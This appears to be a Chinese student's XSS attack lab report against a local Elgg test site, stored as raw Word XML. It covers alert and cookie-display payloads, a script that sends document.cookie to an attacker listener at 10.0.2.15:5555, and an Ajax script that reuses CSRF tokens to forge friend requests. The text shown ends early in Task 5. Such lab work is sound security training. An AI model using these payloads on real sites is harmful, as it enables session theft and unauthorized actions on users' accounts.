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CE86A5" w14:textId="0AB203F0" w:rsidR="00EA1319" w:rsidRDefault="006001F9" w:rsidP="006001F9">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006001F9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Cross-Site Scripting (XSS) Attack Lab</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A4DBD51" w14:textId="1FB1E7D7" w:rsidR="006001F9" w:rsidRDefault="006001F9" w:rsidP="006001F9">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>姓名：严佳豪，学号：57118136</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0717E37A" w14:textId="3A7E648F" w:rsidR="006001F9" w:rsidRDefault="006001F9" w:rsidP="006001F9"/>
    <w:p w14:paraId="1DE4A65B" w14:textId="1E533780" w:rsidR="006001F9" w:rsidRPr="006001F9" w:rsidRDefault="006001F9" w:rsidP="006001F9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006001F9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Task 1: Posting a Malicious Message to Display an Alert Window</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08BE1FB2" w14:textId="6D613C54" w:rsidR="006001F9" w:rsidRDefault="006001F9" w:rsidP="006001F9">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在Elgg网站上登</w:t>
      </w:r>
      <w:r w:rsidR="008F7B0E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>录</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Samy账号，</w:t>
      </w:r>
      <w:r w:rsidR="00ED1C2F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>修改个人简介</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，内容如下</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="726BF4FB" w14:textId="31E65733" w:rsidR="006001F9" w:rsidRDefault="00ED1C2F" w:rsidP="006001F9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C8A78E6" wp14:editId="7F1E3FE7">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-68580</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>266700</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5274310" cy="76200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21" b="29117"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto"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01F9" w:rsidRPr="006001F9">
        <w:t>&lt;script&gt;alert(</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="006001F9" w:rsidRPr="006001F9">
        <w:t>XSS</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="006001F9" w:rsidRPr="006001F9">
        <w:t>);&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11F8C884" w14:textId="38862FBC" w:rsidR="006001F9" w:rsidRPr="00ED1C2F" w:rsidRDefault="006001F9" w:rsidP="006001F9"/>
    <w:p w14:paraId="2C8A0516" w14:textId="464D40E5" w:rsidR="006001F9" w:rsidRDefault="00ED1C2F" w:rsidP="006001F9">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251660288" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7B02CF7C" wp14:editId="0967BA00">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-114300</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>312420</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5274310" cy="1844040"/>
            <wp:effectExtent l="0" t="0" r="2540" b="381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88" b="32199"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto"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修改完保存，会弹出窗口提示X</w:t>
      </w:r>
      <w:r>
        <w:t>SS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F02A49A" w14:textId="1124A7FD" w:rsidR="00ED1C2F" w:rsidRDefault="00ED1C2F" w:rsidP="006001F9"/>
    <w:p w14:paraId="6D639463" w14:textId="7F0314CA" w:rsidR="006001F9" w:rsidRDefault="006001F9" w:rsidP="006001F9"/>
    <w:p w14:paraId="68A0DE5D" w14:textId="542657D6" w:rsidR="006001F9" w:rsidRPr="00ED1C2F" w:rsidRDefault="00ED1C2F" w:rsidP="006001F9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED1C2F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Task 2: Posting a Malicious Message to Display Cookies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E162FD7" w14:textId="5559AC3D" w:rsidR="009D7E7B" w:rsidRDefault="009D7E7B" w:rsidP="009D7E7B">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在Elgg网站上登</w:t>
      </w:r>
      <w:r w:rsidR="008F7B0E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>录</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Samy账号，修改个人简介，内容如下</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E4E0C3A" w14:textId="3433A674" w:rsidR="006001F9" w:rsidRPr="009D7E7B" w:rsidRDefault="009D7E7B" w:rsidP="006001F9">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251662336" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1B5841D5" wp14:editId="69D4964F">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>-373380</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>270510</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5274310" cy="716280"/>
            <wp:effectExtent l="0" t="0" r="2540" b="762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61" b="44334"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto"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D7E7B">
        <w:t>&lt;script&gt;alert(document.cookie);&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6850C8F3" w14:textId="4B899EB0" w:rsidR="006001F9" w:rsidRDefault="006001F9" w:rsidP="006001F9"/>
    <w:p w14:paraId="13D2B6A5" w14:textId="279D4884" w:rsidR="006001F9" w:rsidRDefault="009D7E7B" w:rsidP="006001F9">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251661312" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="63D59780" wp14:editId="57F3AEF7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5324131" cy="163830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81" b="32391"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5324131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修改完保存，会弹出窗口显示该用户得Cookie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71D1CC9C" w14:textId="6B02F0E5" w:rsidR="006001F9" w:rsidRPr="00365208" w:rsidRDefault="00365208" w:rsidP="006001F9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00365208">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Task 3: Stealing Cookies from the Victim’s Machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EA4E10A" w14:textId="2BF72086" w:rsidR="006001F9" w:rsidRDefault="00365208" w:rsidP="006001F9">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251663360" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="49A66F37" wp14:editId="318EF06E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4770120" cy="2680335"/>
            <wp:effectExtent l="0" t="0" r="0" b="571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72"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4780583" cy="268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首先查看虚拟机IP地址，为10.0.2.15/24</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14647EA7" w14:textId="34A2738A" w:rsidR="00365208" w:rsidRDefault="007375A8" w:rsidP="006001F9">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>启动监听程序监听5555端口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33194EB" wp14:editId="662B0F22">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>3002280</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5274310" cy="641350"/>
            <wp:effectExtent l="0" t="0" r="2540" b="635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88"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto"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CC11A7" w14:textId="197A1DE9" w:rsidR="007375A8" w:rsidRDefault="007375A8" w:rsidP="007375A8">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在Elgg网站上登</w:t>
      </w:r>
      <w:r w:rsidR="008F7B0E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>录</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Samy账号，修改个人简介，内容如下</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60AC835C" w14:textId="00F430CB" w:rsidR="007375A8" w:rsidRDefault="007375A8" w:rsidP="007375A8">
      <w:r>
        <w:t>&lt;script&gt;document.write(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>&lt;img src=http://10.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>.2.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>5:5555?c=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55384666" w14:textId="5328A879" w:rsidR="007375A8" w:rsidRDefault="007375A8" w:rsidP="007375A8">
      <w:r>
        <w:t xml:space="preserve">+ escape(document.cookie) + </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">“ </w:t>
      </w:r>
      <w:r>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CC32798" w14:textId="714511A6" w:rsidR="006001F9" w:rsidRPr="007375A8" w:rsidRDefault="007375A8" w:rsidP="007375A8">
      <w:r>
        <w:t>&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="591B0603" w14:textId="7E45DC3B" w:rsidR="006001F9" w:rsidRDefault="006001F9" w:rsidP="006001F9"/>
    <w:p w14:paraId="4CE16366" w14:textId="04971063" w:rsidR="006001F9" w:rsidRDefault="00274574" w:rsidP="006001F9">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251665408" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3FBAEE40" wp14:editId="3BFBF077">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-114300</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>297180</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5274310" cy="268986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06"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto"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返回终端里的程序，可以看到用户的Cookie被发送到了攻击者的电脑上</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41EE72F3" w14:textId="5C640816" w:rsidR="006001F9" w:rsidRDefault="006001F9" w:rsidP="006001F9"/>
    <w:p w14:paraId="27E68CC8" w14:textId="316BC729" w:rsidR="006001F9" w:rsidRDefault="006001F9" w:rsidP="006001F9"/>
    <w:p w14:paraId="4D54C832" w14:textId="79F8353E" w:rsidR="006001F9" w:rsidRDefault="006001F9" w:rsidP="006001F9"/>
    <w:p w14:paraId="7CB743AC" w14:textId="7F7A4373" w:rsidR="006001F9" w:rsidRPr="00371799" w:rsidRDefault="00371799" w:rsidP="006001F9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00371799">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Task 4: Becoming the Victim’s Friend</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D01D171" w14:textId="4DEC3B97" w:rsidR="006001F9" w:rsidRDefault="00371799" w:rsidP="006001F9">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251666432" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="327DD7C3" wp14:editId="6A42B179">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>784860</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5274310" cy="150876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62"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto"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首先使用admin账号登</w:t>
      </w:r>
      <w:r w:rsidR="008F7B0E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>录</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，并添加samy为好友，通过http</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>header</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> live</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>插件来捕捉加好友的请求</w:t>
      </w:r>
      <w:r w:rsidR="00C60E7F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，通过</w:t>
      </w:r>
      <w:r w:rsidR="00C60E7F" w:rsidRPr="00C60E7F">
        <w:t>elgg.security.token.__elgg_ts和elgg.security.token.__elgg_token这两个Javascript变量获得_elgg_ts、__elgg_token这两个参数的值</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BF56F02" w14:textId="79D4CC53" w:rsidR="00C60E7F" w:rsidRDefault="00C60E7F" w:rsidP="006001F9"/>
    <w:p w14:paraId="4ACF33BA" w14:textId="5C0F58A5" w:rsidR="00C60E7F" w:rsidRDefault="00C60E7F" w:rsidP="006001F9"/>
    <w:p w14:paraId="439A9664" w14:textId="61DDAA3B" w:rsidR="006001F9" w:rsidRDefault="00C60E7F" w:rsidP="00C60E7F">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>得到指明添加好友对象后的url应为</w:t>
      </w:r>
      <w:r>
        <w:t>http://www.xsslabelgg.com/action/friends/add?friend=47</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="331AB54C" w14:textId="7DD74A75" w:rsidR="00C60E7F" w:rsidRDefault="00C60E7F" w:rsidP="006001F9"/>
    <w:p w14:paraId="54366A84" w14:textId="506486FD" w:rsidR="00C60E7F" w:rsidRDefault="00C60E7F" w:rsidP="006001F9">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后，登</w:t>
      </w:r>
      <w:r w:rsidR="008F7B0E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>录</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>samy的账号，在个人主页里构造如下代码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36B8FD8A" w14:textId="1B5DC269" w:rsidR="00C60E7F" w:rsidRDefault="00C60E7F" w:rsidP="00C60E7F">
      <w:r>
        <w:t>&lt;script type="text/javascript"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71E35732" w14:textId="2C4DEFC5" w:rsidR="00C60E7F" w:rsidRDefault="00C60E7F" w:rsidP="00C60E7F">
      <w:r>
        <w:tab/>
        <w:t>window.onload = function()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3994FE9E" w14:textId="5098FED8" w:rsidR="00C60E7F" w:rsidRDefault="00C60E7F" w:rsidP="00C60E7F">
      <w:r>
        <w:tab/>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23F8CB24" w14:textId="24661D3E" w:rsidR="00C60E7F" w:rsidRDefault="00C60E7F" w:rsidP="00C60E7F">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>var ts = "&amp;__elgg_ts="+elgg.security.token.__elgg_ts;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A95F275" w14:textId="4280B5E2" w:rsidR="00C60E7F" w:rsidRDefault="00C60E7F" w:rsidP="00C60E7F">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>var token = "&amp;__elgg_token="+elgg.security.token.__elgg_token;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="058325D5" w14:textId="31BB65F7" w:rsidR="00C60E7F" w:rsidRDefault="00C60E7F" w:rsidP="00C60E7F">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>var sendurl = "http://www.xsslabelgg.com/action/friends/add?friend=47"+token+ts;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="134F201E" w14:textId="557D1358" w:rsidR="00C60E7F" w:rsidRDefault="00C60E7F" w:rsidP="00C60E7F">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>Ajax = new XMLHttpRequest();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D8FDA2A" w14:textId="7B5ADAE1" w:rsidR="00C60E7F" w:rsidRDefault="00C60E7F" w:rsidP="00C60E7F">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>Ajax.open("GET",sendurl,true);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72B17118" w14:textId="1EB4A911" w:rsidR="00C60E7F" w:rsidRDefault="00C60E7F" w:rsidP="00C60E7F">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>Ajax.setRequestHeader("Host","www.xsslabelgg.com");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C4C9EE1" w14:textId="5A784337" w:rsidR="00C60E7F" w:rsidRDefault="00C60E7F" w:rsidP="00C60E7F">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>Ajax.setRequestHeader("Content-Type","application/x-www-form-urlencoded");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4277ECA3" w14:textId="485CF570" w:rsidR="00C60E7F" w:rsidRDefault="00C60E7F" w:rsidP="00C60E7F">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>Ajax.send();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DBE0D53" w14:textId="17E92A8A" w:rsidR="00C60E7F" w:rsidRDefault="00C60E7F" w:rsidP="00C60E7F">
      <w:r>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BEEA2E6" w14:textId="5ECE7199" w:rsidR="00C60E7F" w:rsidRPr="00C60E7F" w:rsidRDefault="00C60E7F" w:rsidP="00C60E7F">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251667456" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="55D0DDFC" wp14:editId="2984174E">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-182880</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>358140</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5274310" cy="2438400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33" b="13130"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto"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&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36033C6E" w14:textId="4913CDAF" w:rsidR="006001F9" w:rsidRDefault="009B7100" w:rsidP="006001F9"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5D9AA8E" wp14:editId="2DD040B2">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>495300</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5274310" cy="2340610"/>
            <wp:effectExtent l="0" t="0" r="2540" b="254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35"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto"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切换到admin用户，访问samy的主页，刷新后发现攻击生效，按钮变为Remove</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> friend</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>字样</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44A72640" w14:textId="5D4B47BA" w:rsidR="009B7100" w:rsidRDefault="009B7100" w:rsidP="006001F9"/>
    <w:p w14:paraId="5F13C979" w14:textId="0B256199" w:rsidR="006001F9" w:rsidRDefault="009B7100" w:rsidP="006001F9">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>问题：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ED7C14B" w14:textId="6DD41483" w:rsidR="009B7100" w:rsidRDefault="009B7100" w:rsidP="006001F9">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>问题1答案：</w:t>
      </w:r>
      <w:r w:rsidRPr="009B7100">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>获取添加好友的H</w:t>
      </w:r>
      <w:r>
        <w:t>TTP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>请求时，可以看到</w:t>
      </w:r>
      <w:r w:rsidRPr="009B7100">
        <w:t>URL中有两个额外的参数__elgg_ts 和 __elgg_token</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="009B7100">
        <w:t>这个两个参数是为了防范CSRF攻击的对策，必须正确设置这两个值，否则</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>它</w:t>
      </w:r>
      <w:r w:rsidRPr="009B7100">
        <w:t>就会被视为跨站请求而被丢弃。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="472968F4" w14:textId="071BB671" w:rsidR="006001F9" w:rsidRDefault="009B7100" w:rsidP="006001F9">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>问题2答案：</w:t>
      </w:r>
      <w:r w:rsidR="00AB0C88">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击无法施行。因为</w:t>
      </w:r>
      <w:r w:rsidR="00AB0C88" w:rsidRPr="00AB0C88">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>编辑器会向文本添加格式数据，</w:t>
      </w:r>
      <w:r w:rsidR="00385DBB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>以防止将其错认成代码，</w:t>
      </w:r>
      <w:r w:rsidR="00AB0C88" w:rsidRPr="00AB0C88">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这些添加的数据会导致</w:t>
      </w:r>
      <w:r w:rsidR="00AB0C88" w:rsidRPr="00AB0C88">
        <w:t>Javascript代码出现问题，</w:t>
      </w:r>
      <w:r w:rsidR="00385DBB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>从而导致攻击失效。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E24D6BA" w14:textId="3FE109E9" w:rsidR="006F661C" w:rsidRDefault="006F661C" w:rsidP="006001F9"/>
    <w:p w14:paraId="3C058BBF" w14:textId="7A62CD52" w:rsidR="006F661C" w:rsidRDefault="006F661C" w:rsidP="006001F9"/>
    <w:p w14:paraId="0C4F6F2E" w14:textId="2367C87D" w:rsidR="006F661C" w:rsidRPr="006F661C" w:rsidRDefault="006F661C" w:rsidP="006001F9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F661C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Task 5: Modifying the Victim’s Profile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CBD1779" w14:textId="2C0BA395" w:rsidR="006001F9" w:rsidRDefault="008F7B0E" w:rsidP="006001F9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402CC505" wp14:editId="558F4C04">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>224790</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4855845" cy="2727960"/>
            <wp:effectExtent l="0" t="0" r="190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05"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4855845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登录samy账户，点击修改个人资料并保存，使用H</w:t>
      </w:r>
      <w:r>
        <w:t>TTP H</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>eader</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Live</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>插件获取请求</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44FB113D" w14:textId="16936D76" w:rsidR="008F7B0E" w:rsidRDefault="008F7B0E" w:rsidP="006001F9"/>
